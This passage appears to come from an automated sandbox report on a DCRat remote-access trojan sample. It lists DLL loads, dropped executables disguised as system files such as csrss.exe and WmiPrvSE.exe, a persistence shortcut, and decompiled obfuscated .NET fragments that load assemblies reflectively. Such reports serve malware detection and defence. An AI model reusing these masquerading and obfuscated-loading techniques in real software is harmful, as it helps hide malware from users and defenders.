Source: C:\Windows\System32\schtasks.exe | Section loaded: kernel.appcore.dll
Source: C:\Windows\System32\schtasks.exe | Section loaded: taskschd.dll
Source: C:\Windows\System32\schtasks.exe | Section loaded: sspicli.dll
Source: C:\Windows\System32\schtasks.exe | Section loaded: xmllite.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: atl.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: mscoree.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: kernel.appcore.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: version.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: vcruntime140_clr0400.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: ucrtbase_clr0400.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: cryptsp.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: rsaenh.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: cryptbase.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: amsi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: userenv.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: profapi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: windows.storage.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: wldp.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: msasn1.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: msisip.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: wshext.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: appxsip.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: opcservices.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: gpapi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: secur32.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: sspicli.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: uxtheme.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: urlmon.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: iertutil.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: srvcli.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: netutils.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: propsys.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: wininet.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: microsoft.management.infrastructure.native.unmanaged.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: mi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: miutils.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: wmidcom.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: dpapi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: wbemcomn.dll
Source: C:\Windows\System32\schtasks.exe | Section loaded: kernel.appcore.dll
Source: C:\Windows\System32\schtasks.exe | Section loaded: taskschd.dll
Source: C:\Windows\System32\schtasks.exe | Section loaded: sspicli.dll
Source: C:\Windows\System32\schtasks.exe | Section loaded: xmllite.dll
Source: C:\Windows\System32\schtasks.exe | Section loaded: kernel.appcore.dll
Source: C:\Windows\System32\schtasks.exe | Section loaded: taskschd.dll
Source: C:\Windows\System32\schtasks.exe | Section loaded: sspicli.dll
Source: C:\Windows\System32\schtasks.exe | Section loaded: xmllite.dll
Source: C:\Windows\System32\schtasks.exe | Section loaded: kernel.appcore.dll
Source: C:\Windows\System32\schtasks.exe | Section loaded: taskschd.dll
Source: C:\Windows\System32\schtasks.exe | Section loaded: sspicli.dll
Source: C:\Windows\System32\schtasks.exe | Section loaded: xmllite.dll
Source: C:\Windows\System32\schtasks.exe | Section loaded: kernel.appcore.dll
Source: C:\Windows\System32\schtasks.exe | Section loaded: taskschd.dll
Source: C:\Windows\System32\schtasks.exe | Section loaded: sspicli.dll
Source: C:\Windows\System32\schtasks.exe | Section loaded: xmllite.dll
Source: C:\Users\user\cmd.exe | Section loaded: mscoree.dll
Source: C:\Users\user\cmd.exe | Section loaded: apphelp.dll
Source: C:\Users\user\cmd.exe | Section loaded: kernel.appcore.dll
Source: C:\Users\user\cmd.exe | Section loaded: version.dll
Source: C:\Users\user\cmd.exe | Section loaded: vcruntime140_clr0400.dll
Source: C:\Users\user\cmd.exe | Section loaded: ucrtbase_clr0400.dll
Source: C:\Users\user\cmd.exe | Section loaded: ucrtbase_clr0400.dll
Source: C:\Users\user\cmd.exe | Section loaded: uxtheme.dll
Source: C:\Users\user\cmd.exe | Section loaded: windows.storage.dll
Source: C:\Users\user\cmd.exe | Section loaded: wldp.dll
Source: C:\Users\user\cmd.exe | Section loaded: profapi.dll
Source: C:\Users\user\cmd.exe | Section loaded: cryptsp.dll
Source: C:\Users\user\cmd.exe | Section loaded: rsaenh.dll
Source: C:\Users\user\cmd.exe | Section loaded: cryptbase.dll
Source: C:\Users\user\cmd.exe | Section loaded: sspicli.dll
Source: C:\Windows\System32\schtasks.exe | Section loaded: kernel.appcore.dll
Source: C:\Windows\System32\schtasks.exe | Section loaded: taskschd.dll
Source: C:\Windows\System32\schtasks.exe | Section loaded: sspicli.dll
Source: C:\Windows\System32\schtasks.exe | Section loaded: xmllite.dll
Source: C:\Windows\System32\schtasks.exe | Section loaded: kernel.appcore.dll
Source: C:\Windows\System32\schtasks.exe | Section loaded: taskschd.dll
Source: C:\Windows\System32\schtasks.exe | Section loaded: sspicli.dll
Source: C:\Windows\System32\schtasks.exe | Section loaded: xmllite.dll
Source: C:\Users\user\cmd.exe | Section loaded: mscoree.dll
Source: C:\Users\user\cmd.exe | Section loaded: kernel.appcore.dll
Source: C:\Users\user\cmd.exe | Section loaded: version.dll
Source: C:\Users\user\cmd.exe | Section loaded: vcruntime140_clr0400.dll
Source: C:\Users\user\cmd.exe | Section loaded: ucrtbase_clr0400.dll
Source: C:\Users\user\cmd.exe | Section loaded: ucrtbase_clr0400.dll
Source: C:\Users\user\cmd.exe | Section loaded: uxtheme.dll
Source: C:\Users\user\cmd.exe | Section loaded: windows.storage.dll
Source: C:\Users\user\cmd.exe | Section loaded: wldp.dll
Source: C:\Users\user\cmd.exe | Section loaded: profapi.dll
Source: C:\Users\user\cmd.exe | Section loaded: cryptsp.dll
Source: C:\Users\user\cmd.exe | Section loaded: rsaenh.dll
Source: C:\Users\user\cmd.exe | Section loaded: cryptbase.dll
Source: C:\Users\user\cmd.exe | Section loaded: sspicli.dll
Source: C:\Windows\System32\schtasks.exe | Section loaded: kernel.appcore.dll
Source: C:\Windows\System32\schtasks.exe | Section loaded: taskschd.dll
Source: C:\Windows\System32\schtasks.exe | Section loaded: sspicli.dll
Source: C:\Windows\System32\schtasks.exe | Section loaded: xmllite.dll
Source: C:\Windows\System32\schtasks.exe | Section loaded: kernel.appcore.dll
Source: C:\Windows\System32\schtasks.exe | Section loaded: taskschd.dll
Source: C:\Windows\System32\schtasks.exe | Section loaded: sspicli.dll
Source: C:\Windows\System32\schtasks.exe | Section loaded: xmllite.dll
Source: C:\Windows\System32\schtasks.exe | Section loaded: kernel.appcore.dll
Source: C:\Windows\System32\schtasks.exe | Section loaded: taskschd.dll
Source: C:\Windows\System32\schtasks.exe | Section loaded: sspicli.dll
Source: C:\Windows\System32\schtasks.exe | Section loaded: xmllite.dll
Source: C:\Users\Default\AppData\Roaming\Microsoft\Windows\Printer Shortcuts\hvxmowIikyCfRrhhAMpWFavmEnuKtL.exe | Section loaded: mscoree.dll
Source: C:\Users\Default\AppData\Roaming\Microsoft\Windows\Printer Shortcuts\hvxmowIikyCfRrhhAMpWFavmEnuKtL.exe | Section loaded: apphelp.dll
Source: C:\Users\Default\AppData\Roaming\Microsoft\Windows\Printer Shortcuts\hvxmowIikyCfRrhhAMpWFavmEnuKtL.exe | Section loaded: kernel.appcore.dll
Source: C:\Users\Default\AppData\Roaming\Microsoft\Windows\Printer Shortcuts\hvxmowIikyCfRrhhAMpWFavmEnuKtL.exe | Section loaded: version.dll
Source: C:\Users\Default\AppData\Roaming\Microsoft\Windows\Printer Shortcuts\hvxmowIikyCfRrhhAMpWFavmEnuKtL.exe | Section loaded: vcruntime140_clr0400.dll
Source: C:\Users\Default\AppData\Roaming\Microsoft\Windows\Printer Shortcuts\hvxmowIikyCfRrhhAMpWFavmEnuKtL.exe | Section loaded: ucrtbase_clr0400.dll
Source: C:\Users\Default\AppData\Roaming\Microsoft\Windows\Printer Shortcuts\hvxmowIikyCfRrhhAMpWFavmEnuKtL.exe | Section loaded: ucrtbase_clr0400.dll
Source: C:\Users\Default\AppData\Roaming\Microsoft\Windows\Printer Shortcuts\hvxmowIikyCfRrhhAMpWFavmEnuKtL.exe | Section loaded: uxtheme.dll
Source: C:\Users\Default\AppData\Roaming\Microsoft\Windows\Printer Shortcuts\hvxmowIikyCfRrhhAMpWFavmEnuKtL.exe | Section loaded: windows.storage.dll
Source: C:\Users\Default\AppData\Roaming\Microsoft\Windows\Printer Shortcuts\hvxmowIikyCfRrhhAMpWFavmEnuKtL.exe | Section loaded: wldp.dll
Source: C:\Users\Default\AppData\Roaming\Microsoft\Windows\Printer Shortcuts\hvxmowIikyCfRrhhAMpWFavmEnuKtL.exe | Section loaded: profapi.dll
Source: C:\Users\Default\AppData\Roaming\Microsoft\Windows\Printer Shortcuts\hvxmowIikyCfRrhhAMpWFavmEnuKtL.exe | Section loaded: cryptsp.dll
Source: C:\Users\Default\AppData\Roaming\Microsoft\Windows\Printer Shortcuts\hvxmowIikyCfRrhhAMpWFavmEnuKtL.exe | Section loaded: rsaenh.dll
              Source: C:\Users\Default\AppData\Roaming\Microsoft\Windows\Printer Shortcuts\hvxmowIikyCfRrhhAMpWFavmEnuKtL.exeSection loaded: cryptbase.dll
              Source: C:\Users\Default\AppData\Roaming\Microsoft\Windows\Printer Shortcuts\hvxmowIikyCfRrhhAMpWFavmEnuKtL.exeSection loaded: sspicli.dll
              Source: C:\Windows\System32\schtasks.exeSection loaded: kernel.appcore.dll
              Source: C:\Windows\System32\schtasks.exeSection loaded: taskschd.dll
              Source: C:\Windows\System32\schtasks.exeSection loaded: sspicli.dll
              Source: C:\Windows\System32\schtasks.exeSection loaded: xmllite.dll
              Source: C:\Users\Default\AppData\Roaming\Microsoft\Windows\Printer Shortcuts\hvxmowIikyCfRrhhAMpWFavmEnuKtL.exeSection loaded: mscoree.dll
              Source: C:\Users\Default\AppData\Roaming\Microsoft\Windows\Printer Shortcuts\hvxmowIikyCfRrhhAMpWFavmEnuKtL.exeSection loaded: kernel.appcore.dll
              Source: C:\Users\Default\AppData\Roaming\Microsoft\Windows\Printer Shortcuts\hvxmowIikyCfRrhhAMpWFavmEnuKtL.exeSection loaded: version.dll
              Source: C:\Users\Default\AppData\Roaming\Microsoft\Windows\Printer Shortcuts\hvxmowIikyCfRrhhAMpWFavmEnuKtL.exeSection loaded: vcruntime140_clr0400.dll
              Source: C:\Users\Default\AppData\Roaming\Microsoft\Windows\Printer Shortcuts\hvxmowIikyCfRrhhAMpWFavmEnuKtL.exeSection loaded: ucrtbase_clr0400.dll
              Source: C:\Users\Default\AppData\Roaming\Microsoft\Windows\Printer Shortcuts\hvxmowIikyCfRrhhAMpWFavmEnuKtL.exeSection loaded: uxtheme.dll
              Source: C:\Users\Default\AppData\Roaming\Microsoft\Windows\Printer Shortcuts\hvxmowIikyCfRrhhAMpWFavmEnuKtL.exeSection loaded: windows.storage.dll
              Source: C:\Users\Default\AppData\Roaming\Microsoft\Windows\Printer Shortcuts\hvxmowIikyCfRrhhAMpWFavmEnuKtL.exeSection loaded: wldp.dll
              Source: C:\Users\Default\AppData\Roaming\Microsoft\Windows\Printer Shortcuts\hvxmowIikyCfRrhhAMpWFavmEnuKtL.exeSection loaded: profapi.dll
              Source: C:\Users\Default\AppData\Roaming\Microsoft\Windows\Printer Shortcuts\hvxmowIikyCfRrhhAMpWFavmEnuKtL.exeSection loaded: cryptsp.dll
              Source: C:\Users\Default\AppData\Roaming\Microsoft\Windows\Printer Shortcuts\hvxmowIikyCfRrhhAMpWFavmEnuKtL.exeSection loaded: rsaenh.dll
              Source: C:\Users\Default\AppData\Roaming\Microsoft\Windows\Printer Shortcuts\hvxmowIikyCfRrhhAMpWFavmEnuKtL.exeSection loaded: cryptbase.dll
              Source: C:\Users\Default\AppData\Roaming\Microsoft\Windows\Printer Shortcuts\hvxmowIikyCfRrhhAMpWFavmEnuKtL.exeSection loaded: sspicli.dll
              Source: C:\Program Files (x86)\Windows Defender\en-GB\Memory Compression.exeSection loaded: mscoree.dll
              Source: C:\Program Files (x86)\Windows Defender\en-GB\Memory Compression.exeSection loaded: apphelp.dll
              Source: C:\Program Files (x86)\Windows Defender\en-GB\Memory Compression.exeSection loaded: kernel.appcore.dll
              Source: C:\Program Files (x86)\Windows Defender\en-GB\Memory Compression.exeSection loaded: version.dll
              Source: C:\Program Files (x86)\Windows Defender\en-GB\Memory Compression.exeSection loaded: vcruntime140_clr0400.dll
              Source: C:\Program Files (x86)\Windows Defender\en-GB\Memory Compression.exeSection loaded: ucrtbase_clr0400.dll
              Source: C:\Program Files (x86)\Windows Defender\en-GB\Memory Compression.exeSection loaded: ucrtbase_clr0400.dll
              Source: C:\Program Files (x86)\Windows Defender\en-GB\Memory Compression.exeSection loaded: uxtheme.dll
              Source: C:\Program Files (x86)\Windows Defender\en-GB\Memory Compression.exeSection loaded: windows.storage.dll
              Source: C:\Program Files (x86)\Windows Defender\en-GB\Memory Compression.exeSection loaded: wldp.dll
              Source: C:\Program Files (x86)\Windows Defender\en-GB\Memory Compression.exeSection loaded: profapi.dll
              Source: C:\Program Files (x86)\Windows Defender\en-GB\Memory Compression.exeSection loaded: cryptsp.dll
              Source: C:\Program Files (x86)\Windows Defender\en-GB\Memory Compression.exeSection loaded: rsaenh.dll
              Source: C:\Program Files (x86)\Windows Defender\en-GB\Memory Compression.exeSection loaded: cryptbase.dll
              Source: C:\Program Files (x86)\Windows Defender\en-GB\Memory Compression.exeSection loaded: sspicli.dll
              Source: C:\Program Files (x86)\Windows Defender\en-GB\Memory Compression.exeSection loaded: mscoree.dll
              Source: C:\Program Files (x86)\Windows Defender\en-GB\Memory Compression.exeSection loaded: kernel.appcore.dll
              Source: C:\Program Files (x86)\Windows Defender\en-GB\Memory Compression.exeSection loaded: version.dll
              Source: C:\Program Files (x86)\Windows Defender\en-GB\Memory Compression.exeSection loaded: vcruntime140_clr0400.dll
              Source: C:\Program Files (x86)\Windows Defender\en-GB\Memory Compression.exeSection loaded: ucrtbase_clr0400.dll
              Source: C:\Program Files (x86)\Windows Defender\en-GB\Memory Compression.exeSection loaded: ucrtbase_clr0400.dll
              Source: C:\Program Files (x86)\Windows Defender\en-GB\Memory Compression.exeSection loaded: uxtheme.dll
              Source: C:\Program Files (x86)\Windows Defender\en-GB\Memory Compression.exeSection loaded: windows.storage.dll
              Source: C:\Program Files (x86)\Windows Defender\en-GB\Memory Compression.exeSection loaded: wldp.dll
              Source: C:\Program Files (x86)\Windows Defender\en-GB\Memory Compression.exeSection loaded: profapi.dll
              Source: C:\Program Files (x86)\Windows Defender\en-GB\Memory Compression.exeSection loaded: cryptsp.dll
              Source: C:\Program Files (x86)\Windows Defender\en-GB\Memory Compression.exeSection loaded: rsaenh.dll
              Source: C:\Program Files (x86)\Windows Defender\en-GB\Memory Compression.exeSection loaded: cryptbase.dll
              Source: C:\Program Files (x86)\Windows Defender\en-GB\Memory Compression.exeSection loaded: sspicli.dll
              Source: C:\Windows\System32\cmd.exeSection loaded: cmdext.dll
              Source: C:\Users\user\Desktop\cougif6lqM.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{1f486a52-3cb1-48fd-8f50-b8dc300d9f9d}\InProcServer32Jump to behavior
              Source: JavaClient.lnk.2.drLNK file: ..\..\..\..\..\..\Local\Temp\javaclient.exe
              Source: Window RecorderWindow detected: More than 3 window changes detected
              Source: C:\Users\user\Desktop\cougif6lqM.exeFile opened: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorrc.dllJump to behavior
              Source: C:\Componenthost\providerreviewdhcp.exeDirectory created: C:\Program Files\Windows Mail\WmiPrvSE.exeJump to behavior
              Source: C:\Componenthost\providerreviewdhcp.exeDirectory created: C:\Program Files\Windows Mail\24dbde2999530eJump to behavior
              Source: C:\Componenthost\providerreviewdhcp.exeDirectory created: C:\Program Files\Windows Security\BrowserCore\en-US\csrss.exeJump to behavior
              Source: C:\Componenthost\providerreviewdhcp.exeDirectory created: C:\Program Files\Windows Security\BrowserCore\en-US\886983d96e3d3eJump to behavior
              Source: cougif6lqM.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR
              Source: cougif6lqM.exeStatic PE information: Virtual size of .text is bigger than: 0x100000
              Source: cougif6lqM.exeStatic file information: File size 1265664 > 1048576
              Source: cougif6lqM.exeStatic PE information: Raw size of .text is bigger than: 0x100000 < 0x11de00
              Source: cougif6lqM.exeStatic PE information: DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
              Source: Binary string: D:\Projects\WinRAR\sfx\build\sfxrar32\Release\sfxrar.pdb source: DCRatBuild.exe, 00000003.00000003.1330292606.0000000006981000.00000004.00000020.00020000.00000000.sdmp, DCRatBuild.exe, 00000003.00000002.1334838543.0000000000F33000.00000002.00000001.01000000.00000007.sdmp, DCRatBuild.exe, 00000003.00000000.1328766355.0000000000F33000.00000002.00000001.01000000.00000007.sdmp, DCRatBuild.exe.0.dr

              Data Obfuscation

              Source: javaclient.exe.0.dr, 4KZlQoO1svmgdm30ZchiekvS1KW0OxLVyydzOO.cs	.Net Code: NewLateBinding.LateCall(obj, (Type)null, "Invoke", new object[2]{null,new object[5]{nsDvajUNOxq8slf7VTQIqNti6uU9kwMBSkPQt16B0uEh8eyI5tNgxVgXsAz0JOsfkR28P90WkyucbAS3GJ0UL4rMGP05MIE.MI1iEGpW09rVqJDMiyqjSjXkppRwekowAYmEmg3pb6kcQuE1jVL1ZmLVqVd7DiPXYn4vXWfHZBgSuX4FKWVR4q7Z7RnTJS6,nsDvajUNOxq8slf7VTQIqNti6uU9kwMBSkPQt16B0uEh8eyI5tNgxVgXsAz0JOsfkR28P90WkyucbAS3GJ0UL4rMGP05MIE.BgQ85B6mTS7oT9yGU6XmtQTNLu5qGbk8HGPkkhr9gxIGDJnLCscbRJeDHLbH4Uy7PofCWipjM5GmzRLc3D02d85OppS0bC6,nsDvajUNOxq8slf7VTQIqNti6uU9kwMBSkPQt16B0uEh8eyI5tNgxVgXsAz0JOsfkR28P90WkyucbAS3GJ0UL4rMGP05MIE.tsOa7UX43EE5W1KKyLrKGnrf5yroCfKtC5qUOB1y6TQOJBDxV1uOAnITqndYtRK9PTLIbLjmEaAnGZte5vBi6OOUoIL4ozc,nsDvajUNOxq8slf7VTQIqNti6uU9kwMBSkPQt16B0uEh8eyI5tNgxVgXsAz0JOsfkR28P90WkyucbAS3GJ0UL4rMGP05MIE.j0UmkmvXqRQhxoux08TIUtdT2Kw8SmPyO02DWNlR7Citb8uPYC8eZjcqnBVhm5cgeZhEWYKaN53vP4pVQ0jrrirGQEvxwIQ,mRMv10HbZpwLFNjCwmoHBKxrw0NcMSjvzittQ7G5wQNBNo8SaleZ11W6JDVJ762DAuQ5l0.bXowFz0Fht9cTCjkkACvmbEys0sgrUAJVtJHNPngz2C9ilgh4MeGc2q()}}, (string[])null, (Type[])null, (bool[])null, true)
              Source: javaclient.exe.0.dr, 4KZlQoO1svmgdm30ZchiekvS1KW0OxLVyydzOO.cs	.Net Code: NewLateBinding.LateCall(obj, (Type)null, "Invoke", new object[2]{null,new object[2]{_6YWdCkLrLmys75hT200Cmxk4GnfNHJCMiD3W7s85plRmVyqloZabeo5Ty0z2weNbiw28oJ[2],mRMv10HbZpwLFNjCwmoHBKxrw0NcMSjvzittQ7G5wQNBNo8SaleZ11W6JDVJ762DAuQ5l0.VjkYlsWRf6S5vtySuMpeNjXGtfHROsbku2bRXEkN6tqtSNeXr9oaRYB(Convert.FromBase64String(_6YWdCkLrLmys75hT200Cmxk4GnfNHJCMiD3W7s85plRmVyqloZabeo5Ty0z2weNbiw28oJ[3]))}}, (string[])null, (Type[])null, (bool[])null, true)
              Source: 3.3.DCRatBuild.exe.69ce5b3.0.raw.unpack, PVStjT4hn5scdS4lfYS.cs	.Net Code: typeof(Marshal).GetMethod("GetDelegateForFunctionPointer", new Type[2]{typeof(IntPtr),typeof(Type)})
              Source: 3.3.DCRatBuild.exe.536e5b3.1.raw.unpack, PVStjT4hn5scdS4lfYS.cs	.Net Code: typeof(Marshal).GetMethod("GetDelegateForFunctionPointer", new Type[2]{typeof(IntPtr),typeof(Type)})
              Source: javaclient.exe.0.dr, 4KZlQoO1svmgdm30ZchiekvS1KW0OxLVyydzOO.cs	.Net Code: hja93SIc1BJIhS3C3Hb9fbirVCuS76pOIbvFCY System.AppDomain.Load(byte[])
              Source: javaclient.exe.0.dr, 4KZlQoO1svmgdm30ZchiekvS1KW0OxLVyydzOO.cs	.Net Code: GXBdzhkuOHWVlLRph5t6A8vXW9QzcpKRIegEn2PF5hLbWs1JdguSoVPuiZX7V8SNQ87UT0 System.AppDomain.Load(byte[])
              Source: javaclient.exe.0.dr, 4KZlQoO1svmgdm30ZchiekvS1KW0OxLVyydzOO.cs	.Net Code: GXBdzhkuOHWVlLRph5t6A8vXW9QzcpKRIegEn2PF5hLbWs1JdguSoVPuiZX7V8SNQ87UT0
              Source: 3.3.DCRatBuild.exe.69ce5b3.0.raw.unpack, tp1VHAMlJ4NNAG3oSlG.cs	.Net Code: B8iblQIJNa System.AppDomain.Load(byte[])
              Source: 3.3.DCRatBuild.exe.69ce5b3.0.raw.unpack, tp1VHAMlJ4NNAG3oSlG.cs	.Net Code: B8iblQIJNa System.Reflection.Assembly.Load(byte[])
              Source: 3.3.DCRatBuild.exe.69ce5b3.0.raw.unpack, tp1VHAMlJ4NNAG3oSlG.cs	.Net Code: B8iblQIJNa
              Source: 3.3.DCRatBuild.exe.536e5b3.1.raw.unpack, tp1VHAMlJ4NNAG3oSlG.cs	.Net Code: B8iblQIJNa System.AppDomain.Load(byte[])
              Source: 3.3.DCRatBuild.exe.536e5b3.1.raw.unpack, tp1VHAMlJ4NNAG3oSlG.cs	.Net Code: B8iblQIJNa System.Reflection.Assembly.Load(byte[])
              Source: 3.3.DCRatBuild.exe.536e5b3.1.raw.unpack, tp1VHAMlJ4NNAG3oSlG.cs	.Net Code: B8iblQIJNa
              Source: C:\Users\user\AppData\Local\Temp\DCRatBuild.exe	File created: C:\Componenthost\__tmp_rar_sfx_access_check_6408531
              Source: DCRatBuild.exe.0.dr	Static PE information: section name: .didat
              Source: C:\Users\user\Desktop\cougif6lqM.exe	Code function: 0_2_00007FF886EE00BD pushad ; iretd 0_2_00007FF886EE00C1
              Source: C:\Users\user\AppData\Local\Temp\DCRatBuild.exe	Code function: 3_2_00F1E28C push eax; ret 3_2_00F1E2AA
              Source: C:\Users\user\AppData\Local\Temp\DCRatBuild.exe	Code function: 3_2_00F1ED46 push ecx; ret 3_2_00F1ED59
              Source: C:\Componenthost\providerreviewdhcp.exe	Code function: 7_2_00007FF886EA81F1 push eax; ret 7_2_00007FF886EA81F2
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Code function: 23_2_00007FF886DAD2A5 pushad ; iretd 23_2_00007FF886DAD2A6
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Code function: 23_2_00007FF886EC00BD pushad ; iretd 23_2_00007FF886EC00C1
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Code function: 23_2_00007FF886F97BFC push esp; iretd 23_2_00007FF886F97BFD
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Code function: 23_2_00007FF886F92316 push 8B485F93h; iretd 23_2_00007FF886F9231B
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Code function: 23_2_00007FF886F97F5F push ecx; iretd 23_2_00007FF886F97F61
              Source: C:\Users\user\cmd.exe	Code function: 29_2_00007FF886EB81F1 push eax; ret 29_2_00007FF886EB81F2
              Source: C:\Users\Default\AppData\Roaming\Microsoft\Windows\Printer Shortcuts\hvxmowIikyCfRrhhAMpWFavmEnuKtL.exe	Code function: 38_2_00007FF886ED81F1 push eax; ret 38_2_00007FF886ED81F2
              Source: C:\Users\Default\AppData\Roaming\Microsoft\Windows\Printer Shortcuts\hvxmowIikyCfRrhhAMpWFavmEnuKtL.exe	Code function: 40_2_00007FF886EDBDE4 push E8FFFFFEh; ret 40_2_00007FF886EDBDE9
              Source: C:\Program Files (x86)\Windows Defender\en-GB\Memory Compression.exe	Code function: 41_2_00007FF886EBBDE4 push E8FFFFFEh; ret 41_2_00007FF886EBBDE9
              Source: C:\Program Files (x86)\Windows Defender\en-GB\Memory Compression.exe	Code function: 42_2_00007FF886EDBDE4 push E8FFFFFEh; ret 42_2_00007FF886EDBDE9
              Source: cougif6lqM.exe	Static PE information: section name: .text entropy: 7.998330200111187
              Source: providerreviewdhcp.exe.3.dr	Static PE information: section name: .text entropy: 7.007324800883365
              Source: javaclient.exe.0.dr, Wb9Rc9BKarUg4RFrypNZgV5pqwxCjwKP0mOIvI7cU5KsXP7jz33huhq.cs	High entropy of concatenated method names: '_7Dodhkcxy1E5ftdZvP4no0Y3YihssqBR7eKappwUVa9YfeDZ5y5hN3g', 'dnM6evhItMX1jC4Oq26I56UZ8MtF5TCfi6DTC42zLtrO1grNHf5br8c', 'WMo1RARL3wwEDW4XC63E0lY7si2pkpLaTiskkOfpl6NsroMI0PDdXXS', 'BbGYcqsj23Jn3wt', 'K5i2CiVuJycyNj3', 'sfB4jN90PlAWn04', '_3Tc1rNcs6k9YCJi', 'I56bu7FRXyUSMMq', '_1IeUyMEaoFL2lgg', 'Gvay2SuToTVFvaH'
              Source: javaclient.exe.0.dr, MI7ahEwb4RMEdcFmjxSqMeyJdvN5L0m6OSY7Uw26JfXl44hUzuBW1R0Nt2PrzwVgcqogYZJfjFGmH6.cs	High entropy of concatenated method names: 'Equals', 'GetHashCode', 'GetType', 'ToString', 'Create__Instance__', 'Dispose__Instance__', 'uU9mlenMSBi5RvAipxsEbzRt53u0Fm', 'pXdIG3Z60U1u89cn7aX0d0xoNj1dFg', 'Okrdi5XIAsrn6ZTg6qx58AzeEpgeiQ', '_1q7cR5BmThtwxjv7QjkFB20BtAOPmR'
              Source: javaclient.exe.0.dr, 4KZlQoO1svmgdm30ZchiekvS1KW0OxLVyydzOO.cs	High entropy of concatenated method names: 'b5mqe6JRfZNHFUjoGQz3LjKtro4Q4BaCxl4gEK', 'hja93SIc1BJIhS3C3Hb9fbirVCuS76pOIbvFCY', 'UXv4Pu7mYXDyNw5okxvR54Y2DbUkOqJai2I8gm', 'ppWQQf9bkdt1F9r5hsHfXoLVGNXlwmbAdxTYC4', '_0k3Xdphz4IM7dBZsziG4z5dUanracmaqrMAnBG', 'nKNpkxsStkIpVe0JXSQ7DxNyK1AUyl5saJ47rX', 'KMZC56EUJoQaaQufXl8T3vmpnGnThv62EYOJri', 'JA9DnT8YB2KxTMRFxbAcTmNwEmlFc4ACUq8JR6', 'iXJVYNExaSpn5oP5urblptW1gzSuxQizdD7L0hh5Z7Nk3BFEqEP3ajy8W4rXkTFAE0WHiG', 'spI6G4govUedjBJPBUVS2Oq35Ou7LbcdsWx3xXbIKbYGmwpEkXCzszGPL1rBJC5C7AbuLV'
              Source: javaclient.exe.0.dr, oZUeEdN0kIwhXAwI69kFxA2hZhkNBzdXM1rm5RCd4nrldYnWQyO1s3GSV3ejssi646Zqih.cs	High entropy of concatenated method names: 'yQzifzBfK2E2JSktt3uwXZZb0lM9HuQh64bKdz0oiZZJlbOM7Oo555Y4R6bbAixRm24BGC', '_5AKH5csiFn0ttfR', 'LpNLuceP2gZDRqu', 'oDIOEtIUIz86pQr', 'XHPGxAFVkTsds5f'
